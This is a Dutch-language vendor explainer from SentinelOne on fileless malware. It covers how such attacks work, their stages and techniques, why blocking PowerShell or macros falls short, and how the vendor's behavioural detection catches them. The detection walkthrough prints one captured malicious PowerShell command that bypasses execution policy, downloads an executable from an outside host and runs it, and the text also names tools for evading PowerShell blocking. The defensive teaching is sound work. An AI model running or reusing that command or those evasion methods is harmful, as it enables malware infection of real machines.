Een Leider in het 2025 Gartner® Magic Quadrant™ voor Endpoint Protection Platforms. Vijf jaar op rij.Een Leider in het Gartner® Magic Quadrant™Lees Rapport
Ervaart u een beveiligingslek?Blog
Aan de slagContact Opnemen
Header Navigation - NL
  • Platform
    Platform Overzicht
    • Singularity Platform
      Welkom bij de geïntegreerde bedrijfsbeveiliging
    • AI Beveiligingsportfolio
      Toonaangevend in AI-Powered beveiligingsoplossingen
    • Hoe het werkt
      Het Singularity XDR verschil
    • Singularity Marketplace
      Integraties met één klik om de kracht van XDR te ontsluiten
    • Prijzen en Pakketten
      Vergelijkingen en richtlijnen in één oogopslag
    Data & AI
    • Purple AI
      SecOps versnellen met generatieve AI
    • Singularity Hyperautomation
      Eenvoudig beveiligingsprocessen automatiseren
    • AI-SIEM
      De AI SIEM voor het Autonome SOC
    • Singularity Data Lake
      Aangedreven door AI, verenigd door Data Lake
    • Singularity Data Lake For Log Analytics
      Naadloze opname van gegevens uit on-prem, cloud of hybride omgevingen
    Endpoint Security
    • Singularity Endpoint
      Autonome preventie, detectie en respons
    • Singularity XDR
      Inheemse en open bescherming, detectie en respons
    • Singularity RemoteOps Forensics
      Forensisch onderzoek op schaal orkestreren
    • Singularity Threat Intelligence
      Uitgebreide informatie over tegenstanders
    • Singularity Vulnerability Management
      Rogue Activa Ontdekken
    Cloud Security
    • Singularity Cloud Security
      Blokkeer aanvallen met een AI-gebaseerde CNAPP
    • Singularity Cloud Native Security
      Cloud en ontwikkelingsbronnen beveiligen
    • Singularity Cloud Workload Security
      Platform voor realtime bescherming van de cloudwerklast
    • Singularity Cloud Data Security
      AI-gestuurde detectie van bedreigingen
    • Singularity Cloud Security Posture Management
      Cloud misconfiguraties opsporen en herstellen
    Identity Security
    • Singularity Identity
      Bedreigingsdetectie en -respons voor Identiteit
  • Waarom SentinelOne?
    Waarom SentinelOne?
    • Waarom SentinelOne?
      Cybersecurity Ontworpen voor What’s Next
    • Onze Klanten
      Vertrouwd door 's Werelds Meest Toonaangevende Ondernemingen
    • Industrie Erkenning
      Getest en Gevalideerd door Experts
    • Over Ons
      De Marktleider in Autonome Cybersecurity
    Vergelijk SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Markten
    • Energie
    • Overheid
    • Financieel
    • Zorg
    • Hoger Onderwijs
    • Basis Onderwijs
    • Manufacturing
    • Retail
    • Rijksoverheid & lokale overheden
  • Services
    Managed Services
    • Managed Services Overzicht
      Wayfinder Threat Detection & Response
    • Threat Hunting
      Wereldklasse expertise en Threat Intelligence.
    • Managed Detection & Response
      24/7/365 deskundige MDR voor uw volledige omgeving.
    • Incident Readiness & Response
      Digitale forensica, IRR en paraatheid bij inbreuken.
    Support, Implementatie & Health
    • Technical Account Management
      Customer Success met Maatwerk Service
    • SentinelOne GO
      Begeleid Onboarden en Implementatieadvies
    • SentinelOne University
      Live en On-Demand Training
    • Services Overview
      Allesomvattende oplossingen voor naadloze beveiligingsoperaties
    • SentinelOne Community
      Community Login
  • Partners
    Ons Ecosysteem
    • MSSP Partners
      Versneld Succes behalen met SentinelOne
    • Singularity Marketplace
      Vergroot de Power van S1 Technologie
    • Cyber Risk Partners
      Schakel de Pro Response en Advisory Teams in
    • Technology Alliances
      Geïntegreerde, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Gehost in AWS-regio's over de hele wereld
    • Channel Partners
      Lever de juiste oplossingen, Samen
    Programma Overzicht→
  • Resources
    Resource Center
    • Case Studies
    • Datasheets
    • eBooks
    • Webinars
    • White Papers
    • Events
    Bekijk alle Resources→
    Blog
    • In de Spotlight
    • Voor CISO/CIO
    • Van de Front Lines
    • Cyber Response
    • Identity
    • Cloud
    • macOS
    SentinelOne Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthologie
    • Cybersecurity 101
  • Bedrijf
    Over SentinelOne
    • Over SentinelOne
      De Marktleider in Cybersecurity
    • Labs
      Threat Onderzoek voor de Moderne Threat Hunter
    • Vacatures
      De Nieuwste Vacatures
    • Pers & Nieuws
      Bedrijfsaankondigingen
    • Cybersecurity Blog
      De Laatste Cybersecuritybedreigingen, Nieuws en Meer
    • FAQ
      Krijg Antwoord op de Meest Gestelde Vragen
    • DataSet
      Het Live Data Platform
    • S Foundation
      Zorgen voor een veiligere toekomst voor iedereen
    • S Ventures
      Investeren in Next Generation Security en Data
Aan de slagContact Opnemen
Background image for Wat is bestandsloze malware? Hoe kunt u deze detecteren en voorkomen?
Cybersecurity 101/Threat Intelligence/Bestandsloze malware

Wat is bestandsloze malware? Hoe kunt u deze detecteren en voorkomen?

Fileless malware werkt zonder traditionele bestanden, waardoor het moeilijker te detecteren is. Begrijp de tactieken en hoe u zich tegen deze steeds veranderende dreiging kunt verdedigen.

CS-101_Threat_Intel.svg
Inhoud

Gerelateerde Artikelen

  • Wat is een Advanced Persistent Threat (APT)?
  • Wat is spear phishing? Soorten en voorbeelden
  • Wat is cyberdreigingsinformatie?
  • Wat is een botnet in cyberbeveiliging?
Auteur: SentinelOne
Bijgewerkt: June 24, 2021

Fileless malware werkt zonder traditionele bestanden, waardoor het moeilijk te detecteren is. In deze gids wordt uitgelegd hoe fileless malware werkt, hoe deze infecties veroorzaakt en welke risico's deze vormt voor organisaties.

Lees meer over effectieve detectie- en preventiestrategieën om deze heimelijke bedreiging te bestrijden. Inzicht in fileless malware is cruciaal voor het verbeteren van cyberbeveiliging.

Het SentinelOne H1 2018 Enterprise Risk Index Report laat zien dat aanvallen zonder bestanden tussen januari en juni met 94% zijn toegenomen. PowerShell-aanvallen piekten van 2,5 aanvallen per 1.000 eindpunten in mei 2018 tot 5,2 aanvallen per 1.000 eindpunten in juni.

De afgelopen jaren zijn bedreigers steeds vaker overgestapt op bestandsloze malware als een zeer effectief alternatief.

Fileless Malware - Featured Image | SentinelOne

Wat is fileless malware?

Fileless malware is kwaadaardige code die geen gebruik hoeft te maken van een uitvoerbaar bestand op het bestandssysteem van het eindpunt, behalve de bestanden die daar al aanwezig zijn. Het wordt doorgaans geïnjecteerd in een actief proces en wordt alleen uitgevoerd in het RAM-geheugen. Dit maakt het veel moeilijker voor traditionele antivirussoftware en andere eindpuntbeveiliging producten om te detecteren of te voorkomen vanwege de kleine voetafdruk en de afwezigheid van bestanden om te scannen.

Een voorbeeld dat de VS, Canada en Europa trof, was een spamcampagne waarbij kwaadaardige Word-documenten werden verspreid die bij het openen macro's uitvoerden en daarbij bestandsloze malware verspreidden. In gevallen als deze verwijst 'bestandsloos' naar het feit dat aanvallers gebruikmaken van Windows PowerShell gebruiken om een uitvoerbaar bestand rechtstreeks in het geheugen te laden in plaats van het naar de schijf te schrijven (waar het door gemiddelde malwarescanners kan worden gedetecteerd).

Er zijn veel andere manieren om code op een apparaat uit te voeren zonder gebruik te maken van uitvoerbare bestanden. Deze maken vaak gebruik van systeemprocessen die beschikbaar zijn en door het besturingssysteem worden vertrouwd.

Enkele voorbeelden hiervan zijn:

  • VBScript
  • JScript
  • Batchbestanden
  • PowerShell
  • Windows Management Instrumentation (WMI)
  • Mshta en rundll32 (of andere door Windows ondertekende bestanden die schadelijke code kunnen uitvoeren)

Malware verborgen in documenten zijn ook fileless-aanvallen

Naast de fileless-aanval die systeem bestanden gebruikt om kwaadaardige code uit te voeren, is er nog een ander type aanval dat veel voorkomt en als fileless wordt beschouwd: malware die verborgen is in documenten. Hoewel dergelijke gegevensbestanden geen code mogen uitvoeren, zijn er kwetsbaarheden in Microsoft Office en PDF-readers die kwaadwillenden kunnen misbruiken om code uit te voeren. Een geïnfecteerd document kan bijvoorbeeld een kwaadaardige PowerShell-opdracht activeren. Er zijn ook enkele ingebouwde functionaliteiten die code-uitvoering binnen documenten mogelijk maken, zoals macro's en DDE-aanval.

Hoe werkt bestandsloze malware?

De meest voorkomende vorm van bestandsloze malware in het wild is wanneer een slachtoffer op een spamlink in een e-mail of op een frauduleuze website klikt.

Die link of website laadt vervolgens de Flash-applicatie en implementeert een relevante exploit om de computer van de gebruiker te infecteren. Daarna gebruikt de malware shellcode om een commando uit te voeren waarmee het de payload uitsluitend in het geheugen kan downloaden en uitvoeren.

Dit betekent dat er geen spoor van zijn activiteit achterblijft. Afhankelijk van de doelstellingen van de hacker kan de malware gevoelige gegevens compromitteren, schade toebrengen aan de computer van het slachtoffer of andere schadelijke acties uitvoeren, zoals gegevensdiefstal en versleuteling.

Hackers doen zich doorgaans voor als een betrouwbare of bekende bron om het slachtoffer te overtuigen op de door hen verstrekte link te klikken. Dit is vooral effectief in formele situaties waarin het slachtoffer denkt dat een medewerker of leidinggevende van zijn bedrijf contact met hem opneemt.

Het belangrijkste om te onthouden is dat dit type malware-aanval afhankelijk is van social engineering om succesvol te zijn.

Kenmerken van fileless malware

Dit type kwaadaardige software maakt gebruik van programma's die al op de computer staan. Het gedrag ervan kan niet worden gedetecteerd door heuristische scanners en het heeft geen identificeerbare code of handtekening.

Bovendien bevindt fileless malware zich in het geheugen van het systeem.

Om te functioneren, maakt het gebruik van de processen van het geïnfecteerde besturingssysteem. Meer geavanceerde fileless malware kan ook worden gecombineerd met andere soorten malware om complexe cyberaanvallen te vergemakkelijken. Onder de juiste omstandigheden kan het zelfs zowel whitelisting als sandboxing omzeilen.

Fasen van een fileless malware-aanval

Een fileless malware-aanval is vrij uniek in de manier waarop deze functioneert. Inzicht in hoe deze werkt, kan een organisatie helpen zich in de toekomst te beschermen tegen fileless malware-aanvallen. Laten we eens kijken wat u moet weten.

1. Malware krijgt toegang tot de machine

Voordat een bedreiger zijn malware-aanval volledig kan uitvoeren, moet hij eerst toegang krijgen tot de computer van het slachtoffer, vaak met behulp van een phishing e-mail of social engineering-tactiek. Daarna kan hij beginnen met de volgende fasen van het proces.

Een andere manier om toegang te krijgen tot de computer van een slachtoffer is via gecompromitteerde inloggegevens. Door inloggegevens te stelen, krijgt de hacker vrije toegang tot het systeem en kan hij deze informatie vervolgens gebruiken om toegang te krijgen tot andere omgevingen. Het verkrijgen van initiële toegang tot de computer geeft de hacker bijvoorbeeld misschien niet de benodigde rechten, maar hij kan mogelijk wel de inloggegevens bemachtigen om deze gegevens te verkrijgen.

2. Het programma zorgt voor persistentie

Nadat toegang is verkregen, creëert de malware een achterdeur waardoor de hacker op elk gewenst moment toegang heeft tot de computer. Het belangrijkste doel van deze actie is om te voorkomen dat de toegang tot het apparaat verloren gaat, zodat het verzamelen van informatie gedurende lange tijd kan worden voortgezet.

3. Gegevensdiefstal

De laatste fase is gegevensdiefstal. Nadat de aanvaller de benodigde informatie heeft gevonden, worden de gegevens naar een andere omgeving gestolen. Hierdoor kunnen ze gedurende lange tijd onopgemerkt gevoelige gegevens verzamelen en dit zo vaak als nodig herhalen.

Veelgebruikte technieken voor fileless malware

Een goed begrip van de verschillende technieken helpt u om in de toekomst een aanval te herkennen. Hier zijn zes soorten malware die gebruikmaken van fileless-mogelijkheden om beter aan detectie te ontsnappen:

1. Memory-resident malware

Door gebruik te maken van de geheugenruimte van een echt Windows-bestand kunnen aanvallers kwaadaardige code laden die inactief blijft totdat deze wordt geactiveerd. Het bestandsloze aspect houdt in dat standaard antivirussoftware die bestanden scant, de malware niet kan detecteren.

2. Rootkits

Omdat rootkits op de kernel staan in plaats van in een bestand, hebben ze krachtige mogelijkheden om detectie te vermijden. Ze zijn 100% bestandsloos, maar passen in deze categorie omdat deze zich verder ontwikkelt.

3. Windows-registermalware

Net als in het bovenstaande voorbeeld maken deze aanvallen gebruik van de Windows-registerdatabase waarin laagwaardige instellingen voor verschillende toepassingen worden opgeslagen. De malware is afhankelijk van code die via een bestand wordt uitgevoerd, maar dit bestand is zo ingesteld dat het zichzelf na uitvoering vernietigt, waardoor de malware als bestandsloos blijft bestaan.

4. Valse inloggegevens

Zoals de naam al aangeeft, maakt deze aanval gebruik van gecompromitteerde inloggegevens van een legitieme gebruiker (ook wel gestolen gebruikersnaam en wachtwoord genoemd). Nadat de hacker toegang heeft gekregen tot het systeem, implementeert hij een shellcode om zijn aanval op de machine te vergemakkelijken.

In extreme gevallen kunnen ze zelfs code in het register plaatsen om permanente toegang tot de computer te verkrijgen.

5. Fileless ransomware

Voor degenen die niet bekend zijn met dit type malware: ransomware een kwaadaardig programma dat hackers gebruiken om geld af te persen van hun slachtoffers. Ze versleutelen vaak gevoelige gegevens en dreigen deze te verwijderen tenzij een bepaald bedrag wordt betaald, vaak via cryptovaluta.

Wanneer dit type fileless-aanval plaatsvindt, kunnen hackers aanvallen zonder ooit iets naar de schijf van de machine te schrijven. Dit maakt het moeilijk om te ontdekken totdat het te laat is.

6. Exploitkits

Kwaadwillenden gebruiken een verzameling tools, exploitkits genaamd, om misbruik te maken van kwetsbaarheden op de computer van een slachtoffer. Deze aanvallen beginnen doorgaans zoals een typische fileless malware-aanval, wat betekent dat ze de gebruiker vaak overhalen om op een frauduleuze link te klikken.

Zodra het programma de machine kan infiltreren, kan de exploitkit het systeem scannen om kwetsbaarheden te vinden waarvan misbruik kan worden gemaakt en vervolgens een specifieke reeks exploits bedenken om in te zetten. Vaak blijft de malware onopgemerkt en krijgt deze uitgebreide toegang tot het systeem en de gegevens.

Het probleem voor ondernemingen

Een van de redenen waarom bestandsloze malware zo aantrekkelijk is, is dat beveiligingsproducten niet zomaar de systeembestanden of software kunnen blokkeren die bij dit soort aanvallen worden gebruikt. Als een beveiligingsbeheerder bijvoorbeeld PowerShell zou blokkeren, zou dat nadelige gevolgen hebben voor het IT-onderhoud. Hetzelfde geldt voor het blokkeren van Office-documenten of Office-macro's, wat waarschijnlijk een nog grotere impact zou hebben op de bedrijfscontinuïteit.

Door de kleinere voetafdruk en het ontbreken van 'vreemde' uitvoerbare bestanden om te scannen, is het voor traditionele antivirusprogramma's en andere endpointbeveiligingsproducten moeilijk om dit soort aanvallen te detecteren of te voorkomen.

Het probleem voor leveranciers

Bedrijven begrijpen dat het ontbreken van effectieve bescherming tegen bestandsloze malware hun organisatie uiterst kwetsbaar kan maken. Als gevolg daarvan kwamen beveiligingsleveranciers onder druk te staan om deze groeiende dreiging aan te pakken en creëerden ze allerlei patches om hun dekking tegen 'bestandsloze aanvallen' te claimen (of te demonstreren).

Helaas zijn veel van deze pogingen om het probleem op te lossen niet ideaal. Hier volgen enkele standaardoplossingen en waarom ze ontoereikend zijn:

PowerShell blokkeren

Zoals hierboven vermeld, is PowerShell een essentieel hulpmiddel geworden voor IT-teams en heeft het grotendeels het oude cmd-hulpprogramma van Microsoft vervangen als het standaardhulpprogramma voor de opdrachtregel. Het blokkeren ervan zou ernstige verstoringen veroorzaken voor IT-teams. Wat nog belangrijker is, vanuit defensief oogpunt zou het blokkeren ervan zinloos zijn: Er zijn veel openbare bronnen die uitleggen hoe u het PowerShell-uitvoeringsbeleid kunt omzeilen het PowerShell-uitvoeringsbeleid te omzeilen en andere manieren om het te gebruiken die de blokkering van PowerShell.exe omzeilen. Om er een paar te noemen:

  • PowerShell alleen met dll's uitvoeren, met een eenvoudige rundll32-opdracht met behulp van PowerShdll
  • Converteer PowerShell-scripts naar andere EXE-bestanden, met tools zoals PS2EXE
  • Gebruik malware die zijn eigen kopie van PowerShell.exe gebruikt of de lokale PowerShell wijzigt om herkenning van PowerShell door beveiligingsproducten te voorkomen
  • Een PowerShell-script insluiten in de pixels van een PNG-bestand en een oneliner genereren om het uit te voeren met behulp van Invoke-PSImage

MS Office-macrobestanden blokkeren

Om deze aanvalsvector te elimineren, heeft Microsoft een optie toegevoegd om macro's uit te schakelen als site-instelling (vanaf Office 2016). De meeste omgevingen staan ze echter nog steeds toe, dus beveiligingsleveranciers hebben dit voornamelijk op twee manieren aangepakt:

  • Macro's over de hele linie blokkeren – hiermee worden dezelfde beperkingen opgelegd als Microsoft biedt voor organisaties die zonder macro's kunnen
  • De macrocode extraheren voor statische analyse of reputatiecontroles – dit kan in sommige gevallen werken. Het nadeel van deze aanpak is echter dat dergelijke code uiterst moeilijk te classificeren en te detecteren is binnen een aanvaardbaar percentage valse positieven, vooral voor nooit eerder geziene kwaadaardige macro's. Bovendien bestaan er maar heel weinig repositories met goedaardige en kwaadaardige code. Een andere optie is het zoeken naar veelvoorkomende functies die doorgaans bij aanvallen worden aangetroffen, maar ook deze zijn variabel en niet uitgebreid gecatalogiseerd

Detectie aan de serverzijde

Sommige producten maken alleen gebruik van agent-side monitoring en nemen de beslissing op de server of in de cloud. Deze aanpak heeft dezelfde nadelen als elke detectie die niet op het eindpunt plaatsvindt. Om te kunnen werken, is connectiviteit vereist en is preventie onmogelijk omdat de agent moet wachten op een reactie van de server voordat hij actie kan ondernemen.

Hoe fileless malware detecteren

Bestandsloze malware is een van de moeilijkst te detecteren bedreigingen voor traditionele antivirussoftware en verouderde cyberbeveiligingsproducten, omdat deze verouderde, op handtekeningen gebaseerde detectie-, whitelisting- en sandboxing-beveiligingsmethoden kan omzeilen.

Een goede manier om uw organisatie te beschermen tegen fileless malware is door een threat hunting team in te zetten dat actief op zoek gaat naar malware.

Indicatoren van aanvallen worden gemaskeerd en vermengd binnen de omgeving van een organisatie. Er zijn verschillende manieren waarop dit in een systeem kan voorkomen en er is een diepgaand begrip van bedreigingen nodig om bestandsloze malware te ontdekken.

Gedrag, niet identiteit

Het is belangrijk om te kijken naar het gedrag van processen die op het eindpunt worden uitgevoerd, in plaats van de bestanden op de machine te inspecteren. Dit is effectief omdat malwarevarianten, ondanks hun grote en toenemende aantal, op zeer vergelijkbare manieren werken. Het aantal malwaregedragingen is aanzienlijk kleiner dan het aantal manieren waarop een kwaadaardig bestand eruit kan zien, waardoor deze aanpak geschikt is voor preventie en detectie.

Hoewel SentinelOne gebruikmaakt van meerdere engines, waaronder statische en gedragsmatige AI, is de gedragsmatige aanpak uitermate geschikt voor het detecteren en voorkomen van dit soort aanvallen, omdat deze onafhankelijk is van de aanvalsvector.

De effectiviteit van deze aanpak blijkt uit voorbeelden zoals de WannaCry-campagne, waarbij SentinelOne klanten kon verdedigen voordat de ransomware in het wild was opgedoken.

Verbeter uw informatie over bedreigingen

Bekijk hoe de SentinelOne service WatchTower voor het opsporen van bedreigingen meer inzichten kan opleveren en u kan helpen aanvallen te slim af te zijn.

Meer leren

Hoe SentinelOne bestandsloze malware tegenhoudt

SentinelOne controleert alle activiteiten aan de agentzijde op kernelniveau om onderscheid te maken tussen kwaadaardige en goedaardige activiteiten. Aangezien de agent al over de volledige context beschikt: gebruikers, processen, opdrachtregelargumenten, register, bestanden op de schijf en externe communicatie, kan elke kwaadaardige activiteit volledig worden tegengegaan. SentinelOne kan alle kwaadaardige handelingen ongedaan maken en de gebruiker in staat stellen om op een schoon apparaat te werken.

In wezen stelt SentinelOne u in staat om de verborgen kosten van het schoonhouden van uw netwerk van slechte code, voor uw hele netwerk, te vermijden.

Actieve inhoud

Om deze aanpak effectief te implementeren, maakt SentinelOne gebruik van het 'StoryLine'-concept, dat het probleem oplost van het toewijzen van schuld aan de hoofdoorzaak van kwaadaardige activiteiten.

Stel bijvoorbeeld dat een gebruiker een kwaadaardige bijlage downloadt via Outlook, die vervolgens probeert bestanden op de schijf te versleutelen. In dit scenario zou het beschuldigen en in quarantaine plaatsen van Outlook als het bovenliggende proces de werkelijke bron van de kwaadaardige activiteit missen. In plaats daarvan moet Outlook worden opgenomen als bron voor forensische gegevens om te tonen, maar niet om tegen op te treden. U wilt echter wel de hele bedreigingsgroep bestrijden, ongeacht eventuele extra bestanden die zijn geplaatst, registersleutels die zijn aangemaakt of ander schadelijk gedrag.

Met behulp van StoryLine kunnen we de hoofdoorzaak van een bepaalde kwaadaardige stroom vaststellen – en daar de schuld aan toeschrijven –, met of zonder bestand, en kan de klant het incident nauwkeurig afhandelen.

SentinelOne Attack Storyline

Detectie en mitigatie: een stapsgewijze uitleg

Laten we eens kijken naar een scenario waarin de gebruiker een Word-document via een versleutelde e-mail heeft ontvangen. De gebruiker kent de afzender en downloadt het document daarom naar zijn bureaublad en opent het. Zodra hij het bestand opent, krijgt hij het volgende te zien:

fileless malware popup

Zodra op 'Ja' wordt geklikt, wordt de aanval uitgevoerd. Laten we eens kijken wat de SentinelOne-agent detecteert (in dit voorbeeld in de detectiemodus).

SentinelOne-agent detecteert run_me.docx

De beheerder kan precies onderzoeken hoe elk element in dit verhaal heeft bijgedragen aan de aanval.

SentinelOne geeft de exacte opdrachtregel weer waarmee de PowerShell-opdracht wordt aangeroepen:

-ExECUtiONpOlIcy BYpAsS -NoPROfILE -WInDOWSTYLe HIdDEN (neW-oBJeCT SysTem.NeT.weBcliENT).doWNlOADfilE('http://v32gy.worldnews932.ru/file/nit.nbv','C:UsersadminAppDataRoaming.exE');START-proceSS 'C:UsersadminAppDataRoaming.exE'

In een real-life scenario lost de SentinelOne-agent het probleem onmiddellijk op. Dit gebeurt automatisch, zonder dat de beheerder iets hoeft te doen. De beheerder wordt op de hoogte gebracht via sms, SIEM of e-mail.

Conclusie

Uiteindelijk zullen tegenstanders altijd de kortste weg nemen om eindpunten te compromitteren, om zo met zo min mogelijk inspanning het hoogste rendement te behalen. Fileless malware wordt in snel tempo een van de populairste manieren om dit te doen, en om dergelijke aanvallen te voorkomen is het niet voldoende om essentiële bewerkingen zoals PowerShell te blokkeren. Dit is waar SentinelOne, gebaseerd op gedragsmatige AI-detectie en gelaagde beveiliging, echt uitblinkt – door exploits, macro-documenten, exploitkits, PowerShell, PowerSploit en zero day-kwetsbaarheden lokaal af te dekken zonder de dagelijkse productiviteit van uw medewerkers te beïnvloeden.

Vraag een demo aan en ontdek hoe SentinelOne u kan beschermen tegen bestandsloze malware en zero-day-aanvallen!

Veelgestelde vragen over bestandsloze malware

Fileless malware is kwaadaardige code die in het geheugen werkt en niet afhankelijk is van bestanden die op de schijf zijn opgeslagen. Het misbruikt legitieme tools zoals PowerShell of WMI om aanvallen uit te voeren, waarbij het weinig of geen sporen achterlaat die door traditionele antivirusprogramma's kunnen worden opgespoord. Aanvallers gebruiken het om detectie te voorkomen en volhardend te blijven totdat ze krijgen wat ze willen.

Een phishing-e-mail plaatst een kwaadaardige macro in een Word-document. De macro voert een PowerShell-script rechtstreeks in het geheugen uit, downloadt payloads en creëert achterdeurtjes, allemaal zonder een bestand op de schijf op te slaan. De aanval maakt misbruik van vertrouwde systeemprocessen, waardoor het veel moeilijker is voor standaardbeveiligingstools om deze te detecteren.

Fileless malware kan gegevens stelen, ransomware implementeren, achterdeurtjes installeren of aanvallers volledige controle over uw systemen geven. Omdat het gebruikmaakt van legitieme processen en zelden de schijf raakt, is het moeilijk te detecteren en kan het lange tijd in het geheugen blijven, waardoor aanvallers toegang kunnen behouden of dieper in uw netwerk kunnen doordringen.

Veelgebruikte technieken zijn het misbruiken van PowerShell, WMI, Windows Registry en macro's. Aanvallers gebruiken reflectieve DLL-injectie, kwaadaardige scripts en living-off-the-land-binaries (LOLBins) om te voorkomen dat ze bestanden moeten schrijven.

Ze kunnen geplande taken of in het geheugen residente exploits gebruiken, zodat de payload verdwijnt na een herstart of het beëindigen van het proces.

U kunt controleren op verdachte scriptactiviteit, ongebruikelijk gebruik van PowerShell of WMI en geheugenafwijkingen. Endpoint Detection and Response (EDR)-platforms helpen door commandoregelactiviteit en procesgedrag te loggen. Let op nieuwe geplande taken, wijzigingen in het register en onverwachte netwerkverbindingen die kunnen wijzen op bestandsloze bewerkingen.

Systemen kunnen traag werken, onbekende processen in het geheugen vertonen of vreemd netwerkverkeer genereren. U kunt onverwachte PowerShell- of WMI-activiteit, nieuwe geplande taken of wijzigingen in het register zien. Traditionele antivirussoftware zal niet veel vinden, dus u moet letten op aanwijzingen in het gedrag en instabiliteit van het systeem.

Schakel onnodige scriptingtools uit, beperk gebruikersrechten en houd alle software up-to-date. Gebruik EDR-oplossingen om het geheugen- en scriptgebruik te controleren. Train uw personeel om geen verdachte e-mails of bijlagen te openen.

Blokkeer macro's standaard en controleer uw systemen regelmatig op ongebruikelijk gedrag en open netwerkverbindingen.

Ontdek Meer Over Threat Intelligence

Wat is Threat Hunting?Threat Intelligence

Wat is Threat Hunting?

Threat hunting identificeert proactief beveiligingsrisico's. Leer effectieve strategieën voor het uitvoeren van threat hunting in uw organisatie.

Lees Meer
Wat is Business Email Compromise (BEC)?Threat Intelligence

Wat is Business Email Compromise (BEC)?

Business Email Compromise (BEC) richt zich op organisaties via misleidende e-mails. Leer hoe u deze kostbare aanvallen kunt herkennen en voorkomen.

Lees Meer
Wat is OSINT (Open Source Intelligence)?Threat Intelligence

Wat is OSINT (Open Source Intelligence)?

Duik in de betekenis van OSINT (Open Source Intelligence), de geschiedenis ervan en hoe het wordt gebruikt voor ransomwarepreventie, risicobeoordeling en onderzoeken. Ontdek OSINT-tools, frameworks en best practices om bedrijven te beschermen.

Lees Meer
Wat is DNS-kaping? Detectie- en preventiestrategieënThreat Intelligence

Wat is DNS-kaping? Detectie- en preventiestrategieën

DNS-kaping leidt gebruikers om naar kwaadaardige sites. Ontdek hoe deze aanval werkt en bekijk strategieën om uw organisatie hiertegen te beschermen.

Lees Meer
Klaar om uw beveiligingsactiviteiten te revolutioneren?

Klaar om uw beveiligingsactiviteiten te revolutioneren?

Ontdek hoe SentinelOne AI SIEM uw SOC kan transformeren in een autonome krachtcentrale. Neem vandaag nog contact met ons op voor een persoonlijke demo en zie de toekomst van beveiliging in actie.

Vraag een demo aan
  • Aan de slag
  • Vraag een demo aan
  • Product Tour
  • Waarom SentinelOne
  • Prijzen & Pakketten
  • FAQ
  • Contact
  • Contact
  • Support
  • SentinelOne Status
  • Taal
  • Dutch
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Markten
  • Energie
  • Overheid
  • Financieel
  • Zorg
  • Hoger Onderwijs
  • Basis Onderwijs
  • Manufacturing
  • Retail
  • Rijksoverheid & lokale overheden
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Product Tour
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Pers
  • Nieuws
  • Ransomware Anthology
  • Bedrijf
  • Over SentinelOne
  • Onze klanten
  • Vacatures
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • S Foundation
  • S Ventures

©2026 SentinelOne, Alle rechten voorbehouden.

Privacyverklaring Gebruiksvoorwaarden